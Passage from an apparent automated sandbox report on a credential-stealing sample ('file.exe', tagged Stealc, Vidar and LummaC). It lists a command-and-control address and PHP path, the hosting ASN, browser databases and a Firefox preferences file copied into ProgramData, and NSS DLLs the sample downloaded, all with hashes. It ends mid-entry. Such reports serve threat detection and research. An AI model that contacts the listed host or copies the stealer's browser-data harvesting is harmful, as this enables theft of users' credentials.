Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.37	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	4c469e2cf403fea6249e835ddce23de2.exe	Get hash	malicious	Stealc, Vidar	Browse
	6JA2YPtbeB.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	hTR7xY0d0V.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	N83LFtMTUS.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
C:\ProgramData\mozglue.dll	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	4c469e2cf403fea6249e835ddce23de2.exe	Get hash	malicious	Stealc, Vidar	Browse
	6JA2YPtbeB.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	hTR7xY0d0V.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	N83LFtMTUS.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\BGHJJDGHCBGDHIECBGIDAEHCGD

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DAKEHIJJKEGIDHIEHDAFIIDBFB

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBAFHCBFHDHCAAKFHDGDBKFCGC

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GDHIIIIEHCFIECAKFHJD

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HDBKFHIJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HJJJJKEHCAKFBFHJKEHCFIIDAE

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IDBFHJDA

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KJECFHCBKKEBAKFIJDHI

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1743), with CRLF line terminators
Category:	dropped
Size (bytes):	9504
Entropy (8bit):	5.512408163813622
Encrypted:	false
SSDEEP:	192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
MD5:	1191AEB8EAFD5B2D5C29DF9B62C45278
SHA1:	584A8B78810AEE6008839EF3F1AC21FD5435B990
SHA-256:	0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
SHA-512:	86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 4c469e2cf403fea6249e835ddce23de2.exe, Detection: malicious, Browse Filename: 6JA2YPtbeB.exe, Detection: malicious, Browse Filename: hTR7xY0d0V.exe, Detection: malicious, Browse Filename: N83LFtMTUS.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 4c469e2cf403fea6249e835ddce23de2.exe, Detection: malicious, Browse Filename: 6JA2YPtbeB.exe, Detection: malicious, Browse Filename: hTR7xY0d0V.exe, Detection: malicious, Browse Filename: N83LFtMTUS.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
